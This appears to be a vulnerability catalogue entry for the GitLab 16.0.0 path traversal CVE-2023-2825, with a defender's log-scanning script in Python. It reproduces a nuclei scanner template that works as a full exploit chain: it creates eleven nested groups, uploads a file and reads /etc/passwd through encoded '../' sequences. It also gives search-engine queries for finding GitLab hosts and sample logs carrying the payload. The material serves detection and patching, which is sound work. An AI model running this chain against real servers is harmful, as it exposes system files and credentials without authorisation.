GitLab Path Traversal Vulnerability

Vulnerability Information

Vulnerability name: GitLab path traversal vulnerability

Vulnerability IDs:

  • CVE: CVE-2023-2825

Vulnerability type: Directory traversal

Severity: High

Vulnerability description: GitLab is a widely used open-source code hosting and collaboration platform that gives teams version control, code review and continuous integration/continuous deployment (CI/CD) during software development. It is widely deployed in enterprise environments as a software development lifecycle management tool. The vulnerability described here affects version 16.0.0 of GitLab Community Edition and Enterprise Edition. It is a directory traversal flaw: when GitLab serves attachments of a public project nested within at least five groups, it fails to properly validate and restrict the file path being accessed, so an attacker can craft a specially formed request path that bypasses the intended restriction and reads arbitrary files on the server. Exploitation requires no authentication and can be carried out remotely, exposing sensitive data such as system configuration files and user credentials, which poses a serious threat to the affected system. Because GitLab is so widely deployed, the impact of this vulnerability is broad; users are advised to upgrade immediately to an unaffected version.

Vendor: gitlab

Product: GitLab

Affected versions: 16.0.0

Search syntax: title="gitlab"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fcves%2F2023%2FCVE-2023-2825.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.93393
    epss-percentile: 0.99809
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive

variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a00473045022100c3a0188143213dfd2f20284c15140a18d349b3ef0068d203081023388a6dce6e022028a3158b1dc6ed2772340bbd48004786e236e32513f588699f2ab5b3e0aea750:922c64590222798bb761d5b6d8e72950
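The following Python script is an added illustration for defenders; it is not part of the catalogue entry, the nuclei template, or GitLab's own code. It works from the request shape the description and the template's final request share: a project path nested under several groups, `/uploads/<secret>/`, and URL-encoded `../` sequences after the secret. `scan_log` parses constructed access-log lines, decodes the trailing portion until it is stable (so double encoding does not hide it), flags any request whose decoded path contains a `..` segment, and records how many groups the project is nested in so that hits meeting the advisory's "at least five groups" precondition are easy to single out. `resolve_upload` demonstrates the canonicalisation check whose absence the description refers to; it is a generic illustration of the control, not a reconstruction of the fix. The log lines, the `/srv/uploads` base directory and all function names are constructed for this example.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). The second line mirrors
# the template's last request: eleven nested groups, a project, /uploads/<secret>/,
# then URL-encoded "../" sequences ending in etc/passwd. The fourth line uses
# a different encoding of the same idea and was answered with a 404.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jul/2025:10:01:02 +0000] "GET /users/sign_in HTTP/1.1" 200 5120
10.0.0.5 - - [21/Jul/2025:10:01:09 +0000] "GET /g-1/g-2/g-3/g-4/g-5/g-6/g-7/g-8/g-9/g-10/g-11/CVE-2023-2825/uploads/0123456789abcdef/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1823
10.0.0.7 - - [21/Jul/2025:10:02:30 +0000] "GET /team/project/uploads/0123456789abcdef/logo.png HTTP/1.1" 200 9031
10.0.0.8 - - [21/Jul/2025:10:03:11 +0000] "GET /a/b/c/d/e/f/proj/uploads/abcdef0123456789/%2e%2e%2f%2e%2e%2fconfig HTTP/1.1" 404 100
"""

# Common log format: client, identity, user, [time], "METHOD path HTTP/x.y", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Group/project namespace, the upload secret (same character class as the
# template's upload-hash extractor), then whatever follows the secret.
UPLOAD_RE = re.compile(r"^/(?P<namespace>.+?)/uploads/(?P<secret>[0-9a-z]+)/(?P<rest>.*)$")
MIN_NESTED_GROUPS = 5  # precondition stated in the advisory text


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing so %252F-style double encoding is caught."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s


def inspect_upload_path(raw_path: str) -> Optional[dict]:
    """Return finding details if the path is an upload URL whose tail contains a '..' segment."""
    m = UPLOAD_RE.match(raw_path)
    if not m:
        return None
    decoded_rest = fully_decode(m.group("rest"))
    segments = [seg for seg in decoded_rest.replace("\\", "/").split("/") if seg]
    if ".." not in segments:
        return None
    # Every slash in the namespace separates one group from the next (or from the project).
    nested_groups = m.group("namespace").count("/")
    return {
        "nested_groups": nested_groups,
        "meets_precondition": nested_groups >= MIN_NESTED_GROUPS,
        "decoded_target": decoded_rest,
    }


def scan_log(text: str) -> list:
    """Run inspect_upload_path over each log line and collect the hits with request context."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_upload_path(m.group("path"))
        if hit:
            hit.update(client=m.group("client"), status=int(m.group("status")), path=m.group("path"))
            findings.append(hit)
    return findings


def resolve_upload(base_dir: str, secret: str, filename: str) -> Optional[str]:
    """Canonicalise base/secret/filename and refuse anything that resolves outside base_dir.

    Generic illustration of the missing path restriction; not GitLab's code.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, secret, fully_decode(filename)))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run the script to print the two flagged requests. A 200 response on a flagged path is the strongest signal, since the template's matcher expects the file contents to come back with `application/octet-stream`; a 404 on the same shape is still worth an alert as an attempt against the upload handler.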


http://example.com/2025/07/21/github_2426684373/
Author: lianccc
Published: 21 July 2025